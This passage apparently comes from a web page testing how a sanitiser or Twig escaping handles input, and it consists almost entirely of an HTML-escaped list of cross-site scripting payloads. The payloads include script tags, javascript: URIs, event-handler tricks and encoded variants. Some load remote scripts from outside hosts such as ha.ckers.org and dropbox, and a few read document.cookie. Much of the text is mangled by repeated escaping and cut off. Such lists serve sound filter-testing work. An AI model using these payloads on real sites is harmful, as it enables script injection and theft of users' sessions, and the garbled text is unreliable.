HREF=\\\\\\\"http://www.gohttp://www.google.com/ogle.com/\\\\\\\"&gt;XSS&lt;/A&gt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt\\r\\n&lt;\\r\\n&LT\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&#X3c\\r\\n&#X03c\\r\\n&#X003c\\r\\n&#X0003c\\r\\n&#X00003c\\r\\n&#X000003c\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&#X3C\\r\\n&#X03C\\r\\n&#X003C\\r\\n&#X0003C\\r\\n&#X00003C\\r\\n&#X000003C\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n&lt;\\r\\n\\\\x3c\\r\\n\\\\x3C\\r\\n\\\&lt;\\r\\n\\\&lt;\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html&gt;\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\')\\\\\\\"\\r\\n&lt;SCRIPT SRC=//ha.ckers.org/.js&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;\\r\\n&lt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;;//&lt;\\r\\n&lt;SCRIPT/SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\\\\\"XSS\\\\\\\"&#41;&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\\\\\"http://ha.ckers.org/xss.js\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\" (\\\'XSS\\\');\\\\\\\"&gt;\\r\\nperl -e \\\'print \\\\\\\"&lt;SCR\\\\0IPT&gt;alert&#40;\\\\\\\\\\\"XSS\\\\\\\\\\\"&#41;&lt;/SCR\\\\0IPT&gt;\\\\\\\";\\\' &gt; out\\r\\nperl -e \\\'print \\\\\\\"&lt;IMG SRC=java\\\\0script:alert&#40;\\\\\\\\\\\"XSS\\\\\\\\\\\"&#41;&gt;\\\\\\\";\\\' &gt; out\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;IMG SRC=('XSS')&gt;\\r\\n&lt;IMG SRC=('XSS')&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG \\\\\\\"\\\\\\\"\\\\\\\"&gt;alert&#40;\\\\\\\"XSS\\\\\\\"&#41;\\\\\\\"&gt;\\r\\n&lt;IMG SRC=`(\\\\\\\"RSnake says, \\\'XSS\\\'\\\\\\\")`&gt;\\r\\n&lt;IMG SRC=("XSS")&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=\\\\\\\"(\\\'XSS\\\');\\\\\\\"&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;\\r\\n\\\'\\\';!--\\\\\\\"&lt;XSS&gt;=&{()}\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\\\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83,83&#41;)\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\\\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;\\\"&gt;\\r\\n&lt;IMG &gt;\\r\\n\\r\\n\\r\\n&lt;\\r\\n\\r\\n\\\\\\\";alert&#40;\\\'XSS\\\'&#41;;//\\r\\n&lt;/TITLE&gt;\\r\\nscriptalert&#40;XSS&#41;/script\\r\\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\"(\\\'XSS\\\');\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;DIV url((\\\'XSS\\\'))\\\"&gt;\\r\\n&lt;DIV &gt;\\r\\n&lt;DIV alert&#40;\\\'XSS\\\'&#41;);\\\"&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\"XSS\\\"&#41;\\\';&lt;/STYLE&gt;\\r\\n&lt;IMG &gt;\\&gt;\\r\\nexp/*&lt;A &gt;\\r\\n&lt;EMBED SRC=\\\"http://ha.ckers.org/xss.swf\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\\r\\na=\\\"get\\\";b=\\\"URL(ja\\\\\\\"\\\";c=\\\"vascr\\\";d=\\\"ipt:ale\\\";e=\\\"rt(\\\'XSS\\\');\\\\\\\")\\\";eval&#40;a+b+c+d+e&#41;;\\r\\n\\r\\n&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"&gt;&lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt;&lt;t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS&lt;SCRIPT DEFER&gt;alert&#40;"XSS"&#41;\\\"&gt;&lt;/BODY&gt;&lt;/HTML&gt;\\r\\nPT SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;form id=\\\"test\\\" /&gt;&lt;button &gt;TESTHTML5FORMACTION\\r\\n&lt;form&gt;&lt;button &gt;crosssitespt\\r\\n&lt;frameset &gt;\\r\\n&lt;!--&lt;img &gt;&lt;img &gt;\\r\\n&lt;style&gt;&lt;img &gt;&lt;img &gt;\\r\\n&lt;object data=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&gt;\\r\\n&lt;embed src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&gt;\\r\\n&lt;embed src=\\\"(1)\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"&gt;\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;\\\"&gt;\\r\\n\\r\\n\\r\\n\\r\\n{alert&#40;1&#41;};1\\r\\n\\r\\n&lt;svg xmlns=\\\"#\\\"&gt;&lt;/svg&gt;\\r\\n&lt;svg xmlns=\\\"#\\\"&gt;&lt;/svg&gt;\\r\\n&lt;iframe xmlns=\\\"#\\\" src=\\\"(1)\\\"&gt;&lt;/iframe&gt;\\r\\n\\r\\n\\r\\n"&gt;&lt;"\\r\\n">&lt;"\\r\\n\\r\\n&gt;\\r\\n&gt;\\r\\n&gt;&lt;\\r\\nfoo\\r\\n&lt;scralert&#40;&#41;\\r\\n"/&gt;&lt;BODY src=http://my.box.com/xss.js&gt;")&gt;\\r\\n; alert&#40;&#41;; var foo=\\r\\nfoo\\\\; alert&#40;&#41;;//;\\r\\n\\r\\n&lt;img &gt;\\&gt;\\r\\n\\r\\n\\\"&gt;\\r\\n&lt;video &gt;\\r\\n&lt;audio &gt;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;alert(123);&lt;/script&gt;\\r\\n&lt;ScRipT&gt;alert(\\\&quot;XSS\\\&quot;);&lt;/ScRipT&gt;\\r\\n&lt;script&gt;alert(123)&lt;/script&gt;\\r\\n&lt;script&gt;alert(\\\&quot;hellox worldss\\\&quot;);&lt;/script&gt;\\r\\n&lt;script&gt;alert(XSS)&lt;/script&gt; \\r\\n&lt;script&gt;alert(XSS);&lt;/script&gt;\\r\\n&lt;script&gt;alert(XSS)&lt;/script&gt;\\r\\n&gt;&lt;script&gt;alert(XSS)&lt;/script&gt;\\r\\n&lt;script&gt;alert(/XSS)&lt;/script&gt;\\r\\n&lt;script&gt;alert(/XSS/)&lt;/script&gt;\\r\\n&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\r\\n; alert(1);\\r\\n)alert(1);//\\r\\n&lt;ScRiPt&gt;alert(1)&lt;/sCriPt&gt;\\r\\n&lt;IMG SRC=jAVasCrIPt:alert(XSS)&gt;\\r\\n&lt;IMG SRC=javascript:alert(XSS);&gt;\\r\\n&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;\\r\\n&lt;IMG SRC=javascript:alert(XSS)&gt; \\r\\n&lt;img src=xss onerror=alert(1)&gt;\\r\\n\\r\\n\\r\\n&lt;iframe %00 src=\\\&quot;&amp;Tab;javascript:prompt(1)&amp;Tab;\\\&quot;%00&gt;\\r\\n\\r\\n&lt;svg&gt;&lt;style&gt;{font-family&amp;colon;\\\&#039;&lt;iframe/onload=confirm(1)&gt;\\\&#039;\\r\\n\\r\\n&lt;input/onmouseover=\\\&quot;javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;\\\&quot;\\r\\n\\r\\n&lt;sVg&gt;&lt;scRipt %00&gt;alert&amp;lpar;1&amp;rpar; {Opera}\\r\\n\\r\\n&lt;img/src=`%00` onerror=this.onerror=confirm(1)\\r\\n\\r\\n&lt;form&gt;&lt;isindex formaction=\\\&quot;javascript&amp;colon;confirm(1)\\\&quot;\\r\\n\\r\\n&lt;img src=`%00`&amp;NewLine; onerror=alert(1)&amp;NewLine;\\r\\n\\r\\n&lt;script/&amp;Tab; src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; /&amp;Tab;&gt;&lt;/script&gt;\\r\\n\\r\\n&lt;ScRipT 5-0*3+9/3=&gt;prompt(1)&lt;/ScRipT giveanswerhere=?\\r\\n\\r\\n&lt;iframe/src=\\\&quot;data:text/html;&amp;Tab;base64&amp;Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\&quot;&gt;\\r\\n\\r\\n&lt;script /*%00*/&gt;/*%00*/alert(1)/*%00*/&lt;/script /*%00*/\\r\\n\\r\\n&amp;#34;&amp;#62;&lt;h1/onmouseover=\\\&#039;\\\\u0061lert(1)\\\&#039;&gt;%00\\r\\n\\r\\n&lt;iframe/src=\\\&quot;data:text/html,&lt;svg &amp;#111;&amp;#110;load=alert(1)&gt;\\\&quot;&gt;\\r\\n\\r\\n&lt;meta content=\\\&quot;&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)\\\&quot; http-equiv=\\\&quot;refresh\\\&quot;/&gt;\\r\\n\\r\\n&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open(\\\&#039;https://www.google.com/\\\&#039;)&gt;&lt;/script\\r\\n\\r\\n&lt;svg&gt;&lt;script x:href=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; {Opera}\\r\\n\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;url=javascript:confirm(1)\\\&quot;&gt;\\r\\n&lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;\\r\\n\\r\\n&lt;form&gt;&lt;a href=\\\&quot;javascript:\\\\u0061lert&amp;#x28;1&amp;#x29;\\\&quot;&gt;X\\r\\n\\r\\n&lt;/script&gt;&lt;img/*%00/src=\\\&quot;worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;\\\&quot;/%00*/onerror=\\\&#039;eval(src)\\\&#039;&gt;\\r\\n&lt;img/&amp;#09;&amp;#10;&amp;#11; src=`~` onerror=prompt(1)&gt;\\r\\n&lt;form&gt;&lt;iframe &amp;#09;&amp;#10;&amp;#11; src=\\\&quot;javascript&amp;#58;alert(1)\\\&quot;&amp;#11;&amp;#10;&amp;#09;;&gt;\\r\\n\\r\\n&lt;a href=\\\&quot;data:application/x-x509-user-cert;&amp;NewLine;base64&amp;NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&amp;#09;&amp;#10;&amp;#11;&gt;X&lt;/a\\r\\n\\r\\nhttp://www.google&lt;script .com&gt;alert(document.location)&lt;/script\\r\\n\\r\\n&lt;a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;\\\&quot;&amp;#00; onmouseover=prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;\\\&quot;&gt;XYZ&lt;/a\\r\\n\\r\\n&lt;img/src=@&amp;#32;&amp;#13; onerror = prompt(\\\&#039;&amp;#49;\\\&#039;)\\r\\n\\r\\n&lt;style/onload=prompt&amp;#40;\\\&#039;&amp;#88;&amp;#83;&amp;#83;\\\&#039;&amp;#41;\\r\\n\\r\\n&lt;script ^__^&gt;alert(String.fromCharCode(49))&lt;/script ^__^\\r\\n\\r\\n&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(document.location)/**/&lt;/script &amp;#32; :-(\\r\\n\\r\\n&amp;#00;&lt;/form&gt;&lt;input type&amp;#61;\\\&quot;date\\\&quot; onfocus=\\\&quot;alert(1)\\\&quot;&gt;\\r\\n\\r\\n&lt;form&gt;&lt;textarea &amp;#13; onkeyup=\\\&#039;\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&amp;#x28;1&amp;#x29;\\\&#039;&gt;\\r\\n\\r\\n&lt;script /***/&gt;/***/confirm(\\\&#039;\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\&#039;)/***/&lt;/script /***/\\r\\n\\r\\n&lt;iframe srcdoc=\\\&#039;&amp;lt;body onload=prompt&amp;lpar;1&amp;rpar;&amp;gt;\\\&#039;&gt;\\r\\n\\r\\n&lt;a href=\\\&quot;javascript:void(0)\\\&quot; onmouseover=&amp;NewLine;javascript:alert(1)&amp;NewLine;&gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;script ~~~&gt;alert(0%0)&lt;/script ~~~&gt;\\r\\n\\r\\n&lt;style/onload=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;&gt;\\r\\n\\r\\n&lt;///style///&gt;&lt;span %2F onmousemove=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;SPAN\\r\\n\\r\\n&lt;img/src=\\\&#039;http://i.imgur.com/P8mL8.jpg\\\&#039; onmouseover=&amp;Tab;prompt(1)\\r\\n\\r\\n&amp;#34;&amp;#62;&lt;svg&gt;&lt;style&gt;{-o-link-source&amp;colon;\\\&#039;&lt;body/onload=confirm(1)&gt;\\\&#039;\\r\\n\\r\\n&amp;#13;&lt;blink/&amp;#13; onmouseover=pr&amp;#x6F;mp&amp;#116;(1)&gt;OnMouseOver {Firefox &amp; Opera}\\r\\n\\r\\n&lt;marquee onstart=\\\&#039;javascript:alert&amp;#x28;1&amp;#x29;\\\&#039;&gt;^__^\\r\\n\\r\\n&lt;div/style=\\\&quot;width:expression(confirm(1))\\\&quot;&gt;X&lt;/div&gt; {IE7}\\r\\n\\r\\n&lt;iframe/%00/ src=javaSCRIPT&amp;colon;alert(1)\\r\\n\\r\\n//&lt;form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;&lt;input/type=\\\&#039;submit\\\&#039;&gt;//\\r\\n\\r\\n/*iframe/src*/&lt;iframe/src=\\\&quot;&lt;iframe/src=@\\\&quot;/onload=prompt(1) /*iframe/src*/&gt;\\r\\n\\r\\n//|\\\\\\\\ &lt;script //|\\\\\\\\ src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039;&gt; //|\\\\\\\\ &lt;/script //|\\\\\\\\\\r\\n\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src&amp;#x3A;\\\&#039;&lt;style/onload=this.onload=confirm(1)&gt;\\\&#039;&lt;/font&gt;/&lt;/style&gt;\\r\\n\\r\\n&lt;a/href=\\\&quot;javascript:&amp;#13; javascript:prompt(1)\\\&quot;&gt;&lt;input type=\\\&quot;X\\\&quot;&gt;\\r\\n\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/onmouseover=prompt(1)\\r\\n\\r\\n&lt;/svg&gt;\\\&#039;\\\&#039;&lt;svg&gt;&lt;script \\\&#039;AQuickBrownFoxJumpsOverTheLazyDog\\\&#039;&gt;alert&amp;#x28;1&amp;#x29; {Opera}\\r\\n\\r\\n&lt;a href=\\\&quot;javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t&amp;lpar;1&amp;rpar;\\\&quot;&gt;&lt;button&gt;\\r\\n\\r\\n&lt;div onmouseover=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;DIV&lt;/div&gt;\\r\\n\\r\\n&lt;iframe style=\\\&quot;xg-p:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;\\r\\n\\r\\n&lt;a href=\\\&quot;jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;\\\&quot;&gt;X&lt;/a&gt;\\r\\n\\r\\n&lt;embed src=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n\\r\\n&lt;object data=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n\\r\\n&lt;var onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;On Mouse Over&lt;/var&gt;\\r\\n\\r\\n&lt;a href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;Click Here&lt;/a&gt;\\r\\n\\r\\n&lt;img src=\\\&quot;/\\\&quot; =_=\\\&quot; title=\\\&quot;onerror=\\\&#039;prompt(1)\\\&#039;\\\&quot;&gt;\\r\\n\\r\\n&lt;%&lt;!--\\\&#039;%&gt;&lt;script&gt;alert(1);&lt;/script --&gt;\\r\\n\\r\\n&lt;script src=\\\&quot;data:text/javascript,alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;iframe/src \\\\/\\\\/onload = prompt(1)\\r\\n\\r\\n&lt;iframe/onreadystatechange=alert(1)\\r\\n\\r\\n&lt;svg/onload=alert(1)\\r\\n\\r\\n&lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)\\r\\n\\r\\n&lt;input type=\\\&quot;text\\\&quot; value=`` &lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt;X&lt;/div&gt;\\r\\n\\r\\nhttp://www.&lt;script&gt;alert(1)&lt;/script .com\\r\\n\\r\\n&lt;iframe src=j&amp;NewLine;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;v&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;s&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;c&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;i&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;p&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;colon;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;l&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;e&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;28&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;1&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;%29&gt;&lt;/iframe&gt;\\r\\n\\r\\n&lt;svg&gt;&lt;script ?&gt;alert(1)\\r\\n\\r\\n&lt;iframe src=j&amp;Tab;a&amp;Tab;v&amp;Tab;a&amp;Tab;s&amp;Tab;c&amp;Tab;r&amp;Tab;i&amp;Tab;p&amp;Tab;t&amp;Tab;:a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;%28&amp;Tab;1&amp;Tab;%29&gt;&lt;/iframe&gt;\\r\\n\\r\\n&lt;img src=`xx:xx`onerror=alert(1)&gt;\\r\\n\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;javascript&amp;colon;alert(1)\\\&quot;/&gt;\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n\\r\\n&lt;embed code=\\\&quot;http://businessinfo.co.uk/labs/xss/xss.swf\\\&quot; allowscriptaccess=always&gt;\\r\\n&lt;svg contentScriptType=text/vbs&gt;&lt;script&gt;MsgBox+1\\r\\n\\r\\n&lt;a href=\\\&quot;data:text/html;base64_,&lt;svg/onload=\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\\&quot;&gt;X&lt;/a\\r\\n\\r\\n&lt;iframe/onreadystatechange=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\&#039;\\\\u0061\\\&#039;) worksinIE&gt;\\r\\n\\r\\n&lt;script&gt;~\\\&#039;\\\\u0061\\\&#039; ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\&#039;\\\\u0061\\\&#039;)&lt;/script U+\\r\\n\\r\\n&lt;script/src=\\\&quot;data&amp;colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\&#039;\\\\u0061\\\&#039;)\\\&quot;&gt;&lt;/script a=\\\\u0061 &amp; /=%2F\\r\\n&lt;script/src=data&amp;colon;text/j\\\\u0061v\\\\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\\\\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script\\r\\n\\r\\n&lt;object data=javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\r\\n\\r\\n&lt;script&gt;+-+-1-+-+alert(1)&lt;/script&gt;\\r\\n\\r\\n&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#10alert(1)&gt;\\r\\n\\r\\n&lt;script itworksinallbrowsers&gt;/*&lt;script* */alert(1)&lt;/script\\r\\n\\r\\n&lt;img src ?itworksonchrome?\\\\/onerror = alert(1)\\r\\n\\r\\n&lt;svg&gt;&lt;script&gt;//&amp;NewLine;confirm(1);&lt;/script &lt;/svg&gt;\\r\\n&lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; alert(1)\\r\\n\\r\\n&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&amp;#x3A;&amp;#97lert(1)&gt;ClickMe\\r\\n\\r\\n&lt;script x&gt; alert(1) &lt;/script 1=2\\r\\n\\r\\n&lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt; style=\\\&quot;x:\\\&quot;&gt;\\r\\n\\r\\n&lt;--`&lt;img/src=` onerror=alert(1)&gt; --!&gt;\\r\\n &lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;&lt;/script&gt;\\r\\n\\r\\n&lt;div style=\\\&quot;xg-p:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot; onclick=\\\&quot;alert(1)\\\&quot;&gt;x&lt;/button&gt;\\r\\n\\r\\n\\\&quot;&gt;&lt;img src=x onerror=window.open(\\\&#039;https://www.google.com/\\\&#039;);&gt;\\r\\n\\r\\n&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME\\r\\n\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n\\r\\n&lt;object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n\\r\\n&lt;iframe src=\\\&quot;data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\&quot;&gt;&lt;/iframe&gt;\\r\\n\\r\\n&lt;a href=\\\&quot;data:text/html;blabla,&amp;#60&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#32&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#115&amp;#116&amp;#101&amp;#114&amp;#110&amp;#101&amp;#102&amp;#97&amp;#109&amp;#105&amp;#108&amp;#121&amp;#46&amp;#110&amp;#101&amp;#116&amp;#47&amp;#102&amp;#111&amp;#111&amp;#46&amp;#106&amp;#115&amp;#34&amp;#62&amp;#60&amp;#47&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#62&amp;#8203\\\&quot;&gt;Click Me&lt;/a&gt;\\r\\n\\r\\n&lt;SCRIPT&gt;String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)&lt;/SCRIPT&gt;\\r\\n;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;&gt;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n&lt;IMG &gt;&lt;SCRIPT&gt;alert(XSS)&lt;/SCRIPT&gt;&gt;\\r\\n&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=jav ascript:alert(XSS);&gt;\\r\\n&lt;IMG 